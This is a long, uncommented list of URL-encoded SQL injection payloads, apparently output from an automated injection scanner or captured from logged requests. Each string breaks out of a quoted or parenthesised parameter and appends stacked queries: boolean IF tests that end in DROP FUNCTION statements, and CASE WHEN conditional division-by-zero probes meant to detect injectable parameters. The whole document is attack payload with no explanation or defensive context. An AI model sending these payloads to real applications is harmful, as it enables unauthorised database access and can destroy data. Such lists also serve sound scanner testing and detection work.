1%27%3B%20IF%28%283730%3D3730%29%2CSELECT%203730%2CDROP%20FUNCTION%20PfiY%29%23 1%22%3B%20IF%28%288425%3D2455%29%2CSELECT%208425%2CDROP%20FUNCTION%20NCsa%29%23 1%22%3B%20IF%28%283730%3D3730%29%2CSELECT%203730%2CDROP%20FUNCTION%20PfiY%29%23 1%27%29%3B%20IF%28%288838%3D9654%29%2CSELECT%208838%2CDROP%20FUNCTION%20qZGB%29%23 1%27%29%3B%20IF%28%283730%3D3730%29%2CSELECT%203730%2CDROP%20FUNCTION%20PfiY%29%23 1%27%29%29%3B%20IF%28%288298%3D7768%29%2CSELECT%208298%2CDROP%20FUNCTION%20CLjk%29%23 1%27%29%29%3B%20IF%28%283730%3D3730%29%2CSELECT%203730%2CDROP%20FUNCTION%20PfiY%29%23 1%27%29%29%29%3B%20IF%28%282785%3D7316%29%2CSELECT%202785%2CDROP%20FUNCTION%20dwnN%29%23 1%27%29%29%29%3B%20IF%28%283730%3D3730%29%2CSELECT%203730%2CDROP%20FUNCTION%20PfiY%29%23 1%27%3B%20IF%28%285243%3D6035%29%2CSELECT%205243%2CDROP%20FUNCTION%20XfkH%29%23 1%27%3B%20IF%28%283730%3D3730%29%2CSELECT%203730%2CDROP%20FUNCTION%20PfiY%29%23 1%27%29%3B%20IF%28%288217%3D8280%29%2CSELECT%208217%2CDROP%20FUNCTION%20RCbm%29%23 1%27%29%3B%20IF%28%283730%3D3730%29%2CSELECT%203730%2CDROP%20FUNCTION%20PfiY%29%23 1%27%29%29%3B%20IF%28%282927%3D5834%29%2CSELECT%202927%2CDROP%20FUNCTION%20uKCV%29%23 1%27%29%29%3B%20IF%28%283730%3D3730%29%2CSELECT%203730%2CDROP%20FUNCTION%20PfiY%29%23 1%27%29%29%29%3B%20IF%28%289886%3D7365%29%2CSELECT%209886%2CDROP%20FUNCTION%20faEw%29%23 1%27%29%29%29%3B%20IF%28%283730%3D3730%29%2CSELECT%203730%2CDROP%20FUNCTION%20PfiY%29%23 1%27%3B%20IF%28%289175%3D6767%29%2CSELECT%209175%2CDROP%20FUNCTION%20AKHL%29%23 1%27%3B%20IF%28%283730%3D3730%29%2CSELECT%203730%2CDROP%20FUNCTION%20PfiY%29%23 1%22%29%3B%20IF%28%285436%3D9388%29%2CSELECT%205436%2CDROP%20FUNCTION%20GZnX%29%23 1%22%29%3B%20IF%28%283730%3D3730%29%2CSELECT%203730%2CDROP%20FUNCTION%20PfiY%29%23 1%22%29%29%3B%20IF%28%282054%3D9400%29%2CSELECT%202054%2CDROP%20FUNCTION%20ZJDS%29%23 1%22%29%29%3B%20IF%28%283730%3D3730%29%2CSELECT%203730%2CDROP%20FUNCTION%20PfiY%29%23 1%22%29%29%29%3B%20IF%28%283725%3D5268%29%2CSELECT%203725%2CDROP%20FUNCTION%20iybq%29%23 1%22%29%29%29%3B%20IF%28%283730%3D3730%29%2CSELECT%203730%2CDROP%20FUNCTION%20PfiY%29%23 1%22%3B%20IF%28%289507%3D6515%29%2CSELECT%209507%2CDROP%20FUNCTION%20gwTX%29%23 1%22%3B%20IF%28%283730%3D3730%29%2CSELECT%203730%2CDROP%20FUNCTION%20PfiY%29%23 1%22%29%3B%20IF%28%285863%3D9788%29%2CSELECT%205863%2CDROP%20FUNCTION%20edHU%29%23 1%22%29%3B%20IF%28%283730%3D3730%29%2CSELECT%203730%2CDROP%20FUNCTION%20PfiY%29%23 1%22%29%29%3B%20IF%28%283456%3D8602%29%2CSELECT%203456%2CDROP%20FUNCTION%20Sofc%29%23 1%22%29%29%3B%20IF%28%283730%3D3730%29%2CSELECT%203730%2CDROP%20FUNCTION%20PfiY%29%23 1%22%29%29%29%3B%20IF%28%288690%3D2820%29%2CSELECT%208690%2CDROP%20FUNCTION%20FhAh%29%23 1%22%29%29%29%3B%20IF%28%283730%3D3730%29%2CSELECT%203730%2CDROP%20FUNCTION%20PfiY%29%23 1%22%3B%20IF%28%282789%3D6753%29%2CSELECT%202789%2CDROP%20FUNCTION%20oMAv%29%23 1%22%3B%20IF%28%283730%3D3730%29%2CSELECT%203730%2CDROP%20FUNCTION%20PfiY%29%23 1%25%27%29%3B%20IF%28%281543%3D3992%29%2CSELECT%201543%2CDROP%20FUNCTION%20zvTM%29%23 1%25%27%29%3B%20IF%28%283730%3D3730%29%2CSELECT%203730%2CDROP%20FUNCTION%20PfiY%29%23 1%25%27%29%29%3B%20IF%28%286865%3D9204%29%2CSELECT%206865%2CDROP%20FUNCTION%20uWze%29%23 1%25%27%29%29%3B%20IF%28%283730%3D3730%29%2CSELECT%203730%2CDROP%20FUNCTION%20PfiY%29%23 1%25%27%29%29%29%3B%20IF%28%281219%3D6512%29%2CSELECT%201219%2CDROP%20FUNCTION%20Xyml%29%23 1%25%27%29%29%29%3B%20IF%28%283730%3D3730%29%2CSELECT%203730%2CDROP%20FUNCTION%20PfiY%29%23 1%25%27%3B%20IF%28%283469%3D1876%29%2CSELECT%203469%2CDROP%20FUNCTION%20NGCu%29%23 1%25%27%3B%20IF%28%283730%3D3730%29%2CSELECT%203730%2CDROP%20FUNCTION%20PfiY%29%23 1%00%27%29%3B%20IF%28%287413%3D3867%29%2CSELECT%207413%2CDROP%20FUNCTION%20hQVd%29%23 1%00%27%29%3B%20IF%28%283730%3D3730%29%2CSELECT%203730%2CDROP%20FUNCTION%20PfiY%29%23 1%00%27%3B%20IF%28%284669%3D1631%29%2CSELECT%204669%2CDROP%20FUNCTION%20sZFJ%29%23 1%00%27%3B%20IF%28%283730%3D3730%29%2CSELECT%203730%2CDROP%20FUNCTION%20PfiY%29%23 1%27%29%20WHERE%201945%3D1945%3B%20IF%28%289600%3D8243%29%2CSELECT%209600%2CDROP%20FUNCTION%20qAmN%29%23 1%27%29%20WHERE%209337%3D9337%3B%20IF%28%283730%3D3730%29%2CSELECT%203730%2CDROP%20FUNCTION%20PfiY%29%23 1%22%29%20WHERE%203213%3D3213%3B%20IF%28%282999%3D4538%29%2CSELECT%202999%2CDROP%20FUNCTION%20yTGo%29%23 1%22%29%20WHERE%202892%3D2892%3B%20IF%28%283730%3D3730%29%2CSELECT%203730%2CDROP%20FUNCTION%20PfiY%29%23 1%27%20WHERE%209160%3D9160%3B%20IF%28%282138%3D2351%29%2CSELECT%202138%2CDROP%20FUNCTION%20HaEC%29%23 1%27%20WHERE%204581%3D4581%3B%20IF%28%283730%3D3730%29%2CSELECT%203730%2CDROP%20FUNCTION%20PfiY%29%23 1%22%20WHERE%209718%3D9718%3B%20IF%28%285620%3D2475%29%2CSELECT%205620%2CDROP%20FUNCTION%20OJGB%29%23 1%22%20WHERE%205421%3D5421%3B%20IF%28%283730%3D3730%29%2CSELECT%203730%2CDROP%20FUNCTION%20PfiY%29%23 1%27%7C%7C%28SELECT%20%27nvPa%27%20FROM%20DUAL%20WHERE%202380%3D2380%3B%20IF%28%285460%3D3470%29%2CSELECT%205460%2CDROP%20FUNCTION%20akxw%29%23 1%27%7C%7C%28SELECT%20%27yxby%27%20FROM%20DUAL%20WHERE%209023%3D9023%3B%20IF%28%283730%3D3730%29%2CSELECT%203730%2CDROP%20FUNCTION%20PfiY%29%23 1%27%7C%7C%28SELECT%20%27qess%27%20WHERE%209227%3D9227%3B%20IF%28%287158%3D2729%29%2CSELECT%207158%2CDROP%20FUNCTION%20QxwJ%29%23 1%27%7C%7C%28SELECT%20%27wzaT%27%20WHERE%201767%3D1767%3B%20IF%28%283730%3D3730%29%2CSELECT%203730%2CDROP%20FUNCTION%20PfiY%29%23 1%27%2B%28SELECT%20hStz%20WHERE%203451%3D3451%3B%20IF%28%284930%3D6932%29%2CSELECT%204930%2CDROP%20FUNCTION%20MskQ%29%23 1%27%2B%28SELECT%20XTxq%20WHERE%208738%3D8738%3B%20IF%28%283730%3D3730%29%2CSELECT%203730%2CDROP%20FUNCTION%20PfiY%29%23 1%27%2B%28SELECT%20%27Zsah%27%20WHERE%204234%3D4234%3B%20IF%28%285661%3D2108%29%2CSELECT%205661%2CDROP%20FUNCTION%20AYlA%29%23 1%27%2B%28SELECT%20%27mTjc%27%20WHERE%201474%3D1474%3B%20IF%28%283730%3D3730%29%2CSELECT%203730%2CDROP%20FUNCTION%20PfiY%29%23 1%27%20IN%20BOOLEAN%20MODE%29%3B%20IF%28%284631%3D4981%29%2CSELECT%204631%2CDROP%20FUNCTION%20aILM%29%23 1%27%20IN%20BOOLEAN%20MODE%29%3B%20IF%28%283730%3D3730%29%2CSELECT%203730%2CDROP%20FUNCTION%20PfiY%29%23 1%29%3B%20IF%282094%3D7028%29%20SELECT%202094%20ELSE%20DROP%20FUNCTION%20JQvQ-- 1%29%3B%20IF%281295%3D1295%29%20SELECT%201295%20ELSE%20DROP%20FUNCTION%20RgQK-- 1%29%3B%20IF%287601%3D3909%29%20SELECT%207601%20ELSE%20DROP%20FUNCTION%20omIO-- 1%29%3B%20IF%281295%3D1295%29%20SELECT%201295%20ELSE%20DROP%20FUNCTION%20RgQK-- 1%29%29%3B%20IF%286677%3D4071%29%20SELECT%206677%20ELSE%20DROP%20FUNCTION%20IuOo-- 1%29%29%3B%20IF%281295%3D1295%29%20SELECT%201295%20ELSE%20DROP%20FUNCTION%20RgQK-- 1%29%29%29%3B%20IF%288386%3D1936%29%20SELECT%208386%20ELSE%20DROP%20FUNCTION%20Xrjb-- 1%29%29%29%3B%20IF%281295%3D1295%29%20SELECT%201295%20ELSE%20DROP%20FUNCTION%20RgQK-- 1%3B%20IF%288333%3D8062%29%20SELECT%208333%20ELSE%20DROP%20FUNCTION%20MfgQ-- 1%3B%20IF%281295%3D1295%29%20SELECT%201295%20ELSE%20DROP%20FUNCTION%20RgQK-- 1%29%20WHERE%208110%3D8110%3B%20IF%283118%3D6898%29%20SELECT%203118%20ELSE%20DROP%20FUNCTION%20mPcL-- 1%29%20WHERE%205325%3D5325%3B%20IF%281295%3D1295%29%20SELECT%201295%20ELSE%20DROP%20FUNCTION%20RgQK-- 1%20WHERE%203107%3D3107%3B%20IF%287344%3D1563%29%20SELECT%207344%20ELSE%20DROP%20FUNCTION%20dXvd-- 1%20WHERE%202320%3D2320%3B%20IF%281295%3D1295%29%20SELECT%201295%20ELSE%20DROP%20FUNCTION%20RgQK-- 1%27%29%3B%20IF%285455%3D1997%29%20SELECT%205455%20ELSE%20DROP%20FUNCTION%20IEnM-- 1%27%29%3B%20IF%281295%3D1295%29%20SELECT%201295%20ELSE%20DROP%20FUNCTION%20RgQK-- 1%27%3B%20IF%281663%3D1323%29%20SELECT%201663%20ELSE%20DROP%20FUNCTION%20wMXT-- 1%27%3B%20IF%281295%3D1295%29%20SELECT%201295%20ELSE%20DROP%20FUNCTION%20RgQK-- 1%22%3B%20IF%283893%3D8882%29%20SELECT%203893%20ELSE%20DROP%20FUNCTION%20dlhd-- 1%22%3B%20IF%281295%3D1295%29%20SELECT%201295%20ELSE%20DROP%20FUNCTION%20RgQK-- 1%27%29%3B%20IF%288420%3D7579%29%20SELECT%208420%20ELSE%20DROP%20FUNCTION%20basy-- 1%27%29%3B%20IF%281295%3D1295%29%20SELECT%201295%20ELSE%20DROP%20FUNCTION%20RgQK-- 1%27%29%29%3B%20IF%287728%3D1387%29%20SELECT%207728%20ELSE%20DROP%20FUNCTION%20gSjG-- 1%27%29%29%3B%20IF%281295%3D1295%29%20SELECT%201295%20ELSE%20DROP%20FUNCTION%20RgQK-- 1%27%29%29%29%3B%20IF%283629%3D6143%29%20SELECT%203629%20ELSE%20DROP%20FUNCTION%20RJqJ-- 1%27%29%29%29%3B%20IF%281295%3D1295%29%20SELECT%201295%20ELSE%20DROP%20FUNCTION%20RgQK-- 1%27%3B%20IF%289897%3D6253%29%20SELECT%209897%20ELSE%20DROP%20FUNCTION%20iojp-- 1%27%3B%20IF%281295%3D1295%29%20SELECT%201295%20ELSE%20DROP%20FUNCTION%20RgQK-- 1%27%29%3B%20IF%285226%3D9675%29%20SELECT%205226%20ELSE%20DROP%20FUNCTION%20ZrDh-- 1%27%29%3B%20IF%281295%3D1295%29%20SELECT%201295%20ELSE%20DROP%20FUNCTION%20RgQK-- 1%27%29%29%3B%20IF%285020%3D4597%29%20SELECT%205020%20ELSE%20DROP%20FUNCTION%20OATw-- 1%27%29%29%3B%20IF%281295%3D1295%29%20SELECT%201295%20ELSE%20DROP%20FUNCTION%20RgQK-- 1%27%29%29%29%3B%20IF%285802%3D7824%29%20SELECT%205802%20ELSE%20DROP%20FUNCTION%20ANII-- 1%27%29%29%29%3B%20IF%281295%3D1295%29%20SELECT%201295%20ELSE%20DROP%20FUNCTION%20RgQK-- 1%27%3B%20IF%288034%3D7765%29%20SELECT%208034%20ELSE%20DROP%20FUNCTION%20uDuE-- 1%27%3B%20IF%281295%3D1295%29%20SELECT%201295%20ELSE%20DROP%20FUNCTION%20RgQK-- 1%22%29%3B%20IF%287906%3D2693%29%20SELECT%207906%20ELSE%20DROP%20FUNCTION%20XJFM-- 1%22%29%3B%20IF%281295%3D1295%29%20SELECT%201295%20ELSE%20DROP%20FUNCTION%20RgQK-- 1%22%29%29%3B%20IF%282403%3D5163%29%20SELECT%202403%20ELSE%20DROP%20FUNCTION%20XbDU-- 1%22%29%29%3B%20IF%281295%3D1295%29%20SELECT%201295%20ELSE%20DROP%20FUNCTION%20RgQK-- 1%22%29%29%29%3B%20IF%282885%3D1688%29%20SELECT%202885%20ELSE%20DROP%20FUNCTION%20fKuW-- 1%22%29%29%29%3B%20IF%281295%3D1295%29%20SELECT%201295%20ELSE%20DROP%20FUNCTION%20RgQK-- 1%22%3B%20IF%288553%3D8189%29%20SELECT%208553%20ELSE%20DROP%20FUNCTION%20ySLM-- 1%22%3B%20IF%281295%3D1295%29%20SELECT%201295%20ELSE%20DROP%20FUNCTION%20RgQK-- 1%22%29%3B%20IF%287619%3D4618%29%20SELECT%207619%20ELSE%20DROP%20FUNCTION%20zzcf-- 1%22%29%3B%20IF%281295%3D1295%29%20SELECT%201295%20ELSE%20DROP%20FUNCTION%20RgQK-- 1%22%29%29%3B%20IF%288245%3D7201%29%20SELECT%208245%20ELSE%20DROP%20FUNCTION%20RZUH-- 1%22%29%29%3B%20IF%281295%3D1295%29%20SELECT%201295%20ELSE%20DROP%20FUNCTION%20RgQK-- 1%22%29%29%29%3B%20IF%281164%3D6733%29%20SELECT%201164%20ELSE%20DROP%20FUNCTION%20CuNl-- 1%22%29%29%29%3B%20IF%281295%3D1295%29%20SELECT%201295%20ELSE%20DROP%20FUNCTION%20RgQK-- 1%22%3B%20IF%284877%3D3666%29%20SELECT%204877%20ELSE%20DROP%20FUNCTION%20LGoJ-- 1%22%3B%20IF%281295%3D1295%29%20SELECT%201295%20ELSE%20DROP%20FUNCTION%20RgQK-- 1%25%27%29%3B%20IF%281002%3D7208%29%20SELECT%201002%20ELSE%20DROP%20FUNCTION%20Kkvp-- 1%25%27%29%3B%20IF%281295%3D1295%29%20SELECT%201295%20ELSE%20DROP%20FUNCTION%20RgQK-- 1%25%27%29%29%3B%20IF%288324%3D9216%29%20SELECT%208324%20ELSE%20DROP%20FUNCTION%20bRtY-- 1%25%27%29%29%3B%20IF%281295%3D1295%29%20SELECT%201295%20ELSE%20DROP%20FUNCTION%20RgQK-- 1%25%27%29%29%29%3B%20IF%289400%3D7739%29%20SELECT%209400%20ELSE%20DROP%20FUNCTION%20MgSF-- 1%25%27%29%29%29%3B%20IF%281295%3D1295%29%20SELECT%201295%20ELSE%20DROP%20FUNCTION%20RgQK-- 1%25%27%3B%20IF%286173%3D8563%29%20SELECT%206173%20ELSE%20DROP%20FUNCTION%20lTaM-- 1%25%27%3B%20IF%281295%3D1295%29%20SELECT%201295%20ELSE%20DROP%20FUNCTION%20RgQK-- 1%00%27%29%3B%20IF%281109%3D6866%29%20SELECT%201109%20ELSE%20DROP%20FUNCTION%20Vbff-- 1%00%27%29%3B%20IF%281295%3D1295%29%20SELECT%201295%20ELSE%20DROP%20FUNCTION%20RgQK-- 1%00%27%3B%20IF%287731%3D9429%29%20SELECT%207731%20ELSE%20DROP%20FUNCTION%20MCob-- 1%00%27%3B%20IF%281295%3D1295%29%20SELECT%201295%20ELSE%20DROP%20FUNCTION%20RgQK-- 1%27%29%20WHERE%202698%3D2698%3B%20IF%288565%3D6065%29%20SELECT%208565%20ELSE%20DROP%20FUNCTION%20oUJU-- 1%27%29%20WHERE%208270%3D8270%3B%20IF%281295%3D1295%29%20SELECT%201295%20ELSE%20DROP%20FUNCTION%20RgQK-- 1%22%29%20WHERE%204330%3D4330%3B%20IF%285056%3D7661%29%20SELECT%205056%20ELSE%20DROP%20FUNCTION%20MBhE-- 1%22%29%20WHERE%209275%3D9275%3B%20IF%281295%3D1295%29%20SELECT%201295%20ELSE%20DROP%20FUNCTION%20RgQK-- 1%27%20WHERE%204883%3D4883%3B%20IF%281049%3D7747%29%20SELECT%201049%20ELSE%20DROP%20FUNCTION%20CMPa-- 1%27%20WHERE%204524%3D4524%3B%20IF%281295%3D1295%29%20SELECT%201295%20ELSE%20DROP%20FUNCTION%20RgQK-- 1%22%20WHERE%207550%3D7550%3B%20IF%284936%3D6609%29%20SELECT%204936%20ELSE%20DROP%20FUNCTION%20WehH-- 1%22%20WHERE%202853%3D2853%3B%20IF%281295%3D1295%29%20SELECT%201295%20ELSE%20DROP%20FUNCTION%20RgQK-- 1%27%7C%7C%28SELECT%20%27kXsS%27%20FROM%20DUAL%20WHERE%208883%3D8883%3B%20IF%283893%3D3711%29%20SELECT%203893%20ELSE%20DROP%20FUNCTION%20tEah-- 1%27%7C%7C%28SELECT%20%27Jbbn%27%20FROM%20DUAL%20WHERE%206052%3D6052%3B%20IF%281295%3D1295%29%20SELECT%201295%20ELSE%20DROP%20FUNCTION%20RgQK-- 1%27%7C%7C%28SELECT%20%27igDI%27%20WHERE%207221%3D7221%3B%20IF%282769%3D4696%29%20SELECT%202769%20ELSE%20DROP%20FUNCTION%20KsJp-- 1%27%7C%7C%28SELECT%20%27wkIf%27%20WHERE%201440%3D1440%3B%20IF%281295%3D1295%29%20SELECT%201295%20ELSE%20DROP%20FUNCTION%20RgQK-- 1%27%2B%28SELECT%20ablF%20WHERE%206562%3D6562%3B%20IF%289093%3D9200%29%20SELECT%209093%20ELSE%20DROP%20FUNCTION%20UAep-- 1%27%2B%28SELECT%20zJai%20WHERE%204754%3D4754%3B%20IF%281295%3D1295%29%20SELECT%201295%20ELSE%20DROP%20FUNCTION%20RgQK-- 1%27%2B%28SELECT%20%27ZthB%27%20WHERE%207337%3D7337%3B%20IF%284815%3D8676%29%20SELECT%204815%20ELSE%20DROP%20FUNCTION%20zzQX-- 1%27%2B%28SELECT%20%27zaXX%27%20WHERE%207000%3D7000%3B%20IF%281295%3D1295%29%20SELECT%201295%20ELSE%20DROP%20FUNCTION%20RgQK-- 1%27%20IN%20BOOLEAN%20MODE%29%3B%20IF%287331%3D3609%29%20SELECT%207331%20ELSE%20DROP%20FUNCTION%20aZEZ-- 1%27%20IN%20BOOLEAN%20MODE%29%3B%20IF%281295%3D1295%29%20SELECT%201295%20ELSE%20DROP%20FUNCTION%20RgQK-- -1616%29%3B%20SELECT%20%28CASE%20WHEN%20%285375%3D4360%29%20THEN%205375%20ELSE%201%2F%28SELECT%200%29%20END%29-- -9570%29%3B%20SELECT%20%28CASE%20WHEN%20%287315%3D7315%29%20THEN%207315%20ELSE%201%2F%28SELECT%200%29%20END%29-- -8344%29%3B%20SELECT%20%28CASE%20WHEN%20%281908%3D9469%29%20THEN%201908%20ELSE%201%2F%28SELECT%200%29%20END%29-- -6277%29%3B%20SELECT%20%28CASE%20WHEN%20%283445%3D9418%29%20THEN%203445%20ELSE%201%2F%28SELECT%200%29%20END%29-- -9323%29%3B%20SELECT%20%28CASE%20WHEN%20%287315%3D7315%29%20THEN%207315%20ELSE%201%2F%28SELECT%200%29%20END%29-- -3623%29%3B%20SELECT%20%28CASE%20WHEN%20%287542%3D4131%29%20THEN%207542%20ELSE%201%2F%28SELECT%200%29%20END%29-- -4931%29%29%3B%20SELECT%20%28CASE%20WHEN%20%288748%3D3242%29%20THEN%208748%20ELSE%201%2F%28SELECT%200%29%20END%29-- -4761%29%29%3B%20SELECT%20%28CASE%20WHEN%20%287315%3D7315%29%20THEN%207315%20ELSE%201%2F%28SELECT%200%29%20END%29-- -6402%29%29%3B%20SELECT%20%28CASE%20WHEN%20%287229%3D1838%29%20THEN%207229%20ELSE%201%2F%28SELECT%200%29%20END%29-- -8009%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%284005%3D7357%29%20THEN%204005%20ELSE%201%2F%28SELECT%200%29%20END%29-- -4308%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%287315%3D7315%29%20THEN%207315%20ELSE%201%2F%28SELECT%200%29%20END%29-- -3481%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%281995%3D8093%29%20THEN%201995%20ELSE%201%2F%28SELECT%200%29%20END%29-- -2368%3B%20SELECT%20%28CASE%20WHEN%20%281447%3D6631%29%20THEN%201447%20ELSE%201%2F%28SELECT%200%29%20END%29-- -5018%3B%20SELECT%20%28CASE%20WHEN%20%287315%3D7315%29%20THEN%207315%20ELSE%201%2F%28SELECT%200%29%20END%29-- -2209%3B%20SELECT%20%28CASE%20WHEN%20%282323%3D3419%29%20THEN%202323%20ELSE%201%2F%28SELECT%200%29%20END%29-- -1105%29%20WHERE%208223%3D8223%3B%20SELECT%20%28CASE%20WHEN%20%289063%3D9585%29%20THEN%209063%20ELSE%201%2F%28SELECT%200%29%20END%29-- -7981%29%20WHERE%209869%3D9869%3B%20SELECT%20%28CASE%20WHEN%20%287315%3D7315%29%20THEN%207315%20ELSE%201%2F%28SELECT%200%29%20END%29-- -2616%29%20WHERE%204474%3D4474%3B%20SELECT%20%28CASE%20WHEN%20%282160%3D4837%29%20THEN%202160%20ELSE%201%2F%28SELECT%200%29%20END%29-- -6492%20WHERE%203730%3D3730%3B%20SELECT%20%28CASE%20WHEN%20%286776%3D5227%29%20THEN%206776%20ELSE%201%2F%28SELECT%200%29%20END%29-- -9928%20WHERE%209900%3D9900%3B%20SELECT%20%28CASE%20WHEN%20%287315%3D7315%29%20THEN%207315%20ELSE%201%2F%28SELECT%200%29%20END%29-- -9723%20WHERE%204722%3D4722%3B%20SELECT%20%28CASE%20WHEN%20%288403%3D1857%29%20THEN%208403%20ELSE%201%2F%28SELECT%200%29%20END%29-- -1891%27%29%3B%20SELECT%20%28CASE%20WHEN%20%281228%3D9383%29%20THEN%201228%20ELSE%201%2F%28SELECT%200%29%20END%29-- -4423%27%29%3B%20SELECT%20%28CASE%20WHEN%20%287315%3D7315%29%20THEN%207315%20ELSE%201%2F%28SELECT%200%29%20END%29-- -7623%27%29%3B%20SELECT%20%28CASE%20WHEN%20%285128%3D8849%29%20THEN%205128%20ELSE%201%2F%28SELECT%200%29%20END%29-- -1998%27%3B%20SELECT%20%28CASE%20WHEN%20%285155%3D6141%29%20THEN%205155%20ELSE%201%2F%28SELECT%200%29%20END%29-- -1193%27%3B%20SELECT%20%28CASE%20WHEN%20%287315%3D7315%29%20THEN%207315%20ELSE%201%2F%28SELECT%200%29%20END%29-- -1552%27%3B%20SELECT%20%28CASE%20WHEN%20%282140%3D7104%29%20THEN%202140%20ELSE%201%2F%28SELECT%200%29%20END%29-- -1643%22%3B%20SELECT%20%28CASE%20WHEN%20%285145%3D4823%29%20THEN%205145%20ELSE%201%2F%28SELECT%200%29%20END%29-- -9111%22%3B%20SELECT%20%28CASE%20WHEN%20%287315%3D7315%29%20THEN%207315%20ELSE%201%2F%28SELECT%200%29%20END%29-- -8442%22%3B%20SELECT%20%28CASE%20WHEN%20%288531%3D5837%29%20THEN%208531%20ELSE%201%2F%28SELECT%200%29%20END%29-- -2524%27%29%3B%20SELECT%20%28CASE%20WHEN%20%283049%3D9923%29%20THEN%203049%20ELSE%201%2F%28SELECT%200%29%20END%29-- -9074%27%29%3B%20SELECT%20%28CASE%20WHEN%20%287315%3D7315%29%20THEN%207315%20ELSE%201%2F%28SELECT%200%29%20END%29-- -2512%27%29%3B%20SELECT%20%28CASE%20WHEN%20%284841%3D3413%29%20THEN%204841%20ELSE%201%2F%28SELECT%200%29%20END%29-- -9606%27%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286707%3D3365%29%20THEN%206707%20ELSE%201%2F%28SELECT%200%29%20END%29-- -5213%27%29%29%3B%20SELECT%20%28CASE%20WHEN%20%287315%3D7315%29%20THEN%207315%20ELSE%201%2F%28SELECT%200%29%20END%29-- -8410%27%29%29%3B%20SELECT%20%28CASE%20WHEN%20%282297%3D8081%29%20THEN%202297%20ELSE%201%2F%28SELECT%200%29%20END%29-- -7849%27%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%287208%3D5373%29%20THEN%207208%20ELSE%201%2F%28SELECT%200%29%20END%29-- -5220%27%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%287315%3D7315%29%20THEN%207315%20ELSE%201%2F%28SELECT%200%29%20END%29-- -3868%27%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%288556%3D2267%29%20THEN%208556%20ELSE%201%2F%28SELECT%200%29%20END%29-- -6470%27%3B%20SELECT%20%28CASE%20WHEN%20%285110%3D7342%29%20THEN%205110%20ELSE%201%2F%28SELECT%200%29%20END%29-- -4855%27%3B%20SELECT%20%28CASE%20WHEN%20%287315%3D7315%29%20THEN%207315%20ELSE%201%2F%28SELECT%200%29%20END%29-- -5567%27%3B%20SELECT%20%28CASE%20WHEN%20%286667%3D7011%29%20THEN%206667%20ELSE%201%2F%28SELECT%200%29%20END%29-- -5123%27%29%3B%20SELECT%20%28CASE%20WHEN%20%282884%3D4759%29%20THEN%202884%20ELSE%201%2F%28SELECT%200%29%20END%29-- -8897%27%29%3B%20SELECT%20%28CASE%20WHEN%20%287315%3D7315%29%20THEN%207315%20ELSE%201%2F%28SELECT%200%29%20END%29-- -4273%27%29%3B%20SELECT%20%28CASE%20WHEN%20%288130%3D9414%29%20THEN%208130%20ELSE%201%2F%28SELECT%200%29%20END%29-- -7484%27%29%29%3B%20SELECT%20%28CASE%20WHEN%20%285419%3D6469%29%20THEN%205419%20ELSE%201%2F%28SELECT%200%29%20END%29-- -4894%27%29%29%3B%20SELECT%20%28CASE%20WHEN%20%287315%3D7315%29%20THEN%207315%20ELSE%201%2F%28SELECT%200%29%20END%29-- -4989%27%29%29%3B%20SELECT%20%28CASE%20WHEN%20%285206%3D2306%29%20THEN%205206%20ELSE%201%2F%28SELECT%200%29%20END%29-- -2044%27%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%289678%3D6786%29%20THEN%209678%20ELSE%201%2F%28SELECT%200%29%20END%29-- -1708%27%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%287315%3D7315%29%20THEN%207315%20ELSE%201%2F%28SELECT%200%29%20END%29-- -1431%27%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%285332%3D7133%29%20THEN%205332%20ELSE%201%2F%28SELECT%200%29%20END%29-- -1845%27%3B%20SELECT%20%28CASE%20WHEN%20%289127%3D5925%29%20THEN%209127%20ELSE%201%2F%28SELECT%200%29%20END%29-- -8372%27%3B%20SELECT%20%28CASE%20WHEN%20%287315%3D7315%29%20THEN%207315%20ELSE%201%2F%28SELECT%200%29%20END%29-- -7472%27%3B%20SELECT%20%28CASE%20WHEN%20%282171%3D3110%29%20THEN%202171%20ELSE%201%2F%28SELECT%200%29%20END%29-- -7767%22%29%3B%20SELECT%20%28CASE%20WHEN%20%289364%3D9512%29%20THEN%209364%20ELSE%201%2F%28SELECT%200%29%20END%29-- -5879%22%29%3B%20SELECT%20%28CASE%20WHEN%20%287315%3D7315%29%20THEN%207315%20ELSE%201%2F%28SELECT%200%29%20END%29-- -4174%22%29%3B%20SELECT%20%28CASE%20WHEN%20%288663%3D1151%29%20THEN%208663%20ELSE%201%2F%28SELECT%200%29%20END%29-- -3735%22%29%29%3B%20SELECT%20%28CASE%20WHEN%20%281173%3D3592%29%20THEN%201173%20ELSE%201%2F%28SELECT%200%29%20END%29-- -4561%22%29%29%3B%20SELECT%20%28CASE%20WHEN%20%287315%3D7315%29%20THEN%207315%20ELSE%201%2F%28SELECT%200%29%20END%29-- -6352%22%29%29%3B%20SELECT%20%28CASE%20WHEN%20%287992%3D4076%29%20THEN%207992%20ELSE%201%2F%28SELECT%200%29%20END%29-- -6232%22%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%285173%3D9013%29%20THEN%205173%20ELSE%201%2F%28SELECT%200%29%20END%29-- -5211%22%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%287315%3D7315%29%20THEN%207315%20ELSE%201%2F%28SELECT%200%29%20END%29-- -8585%22%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%283803%3D2490%29%20THEN%203803%20ELSE%201%2F%28SELECT%200%29%20END%29-- -8391%22%3B%20SELECT%20%28CASE%20WHEN%20%285294%3D9328%29%20THEN%205294%20ELSE%201%2F%28SELECT%200%29%20END%29-- -1926%22%3B%20SELECT%20%28CASE%20WHEN%20%287315%3D7315%29%20THEN%207315%20ELSE%201%2F%28SELECT%200%29%20END%29-- -3500%22%3B%20SELECT%20%28CASE%20WHEN%20%282776%3D9980%29%20THEN%202776%20ELSE%201%2F%28SELECT%200%29%20END%29-- -8424%22%29%3B%20SELECT%20%28CASE%20WHEN%20%286641%3D8595%29%20THEN%206641%20ELSE%201%2F%28SELECT%200%29%20END%29-- -3648%22%29%3B%20SELECT%20%28CASE%20WHEN%20%287315%3D7315%29%20THEN%207315%20ELSE%201%2F%28SELECT%200%29%20END%29-- 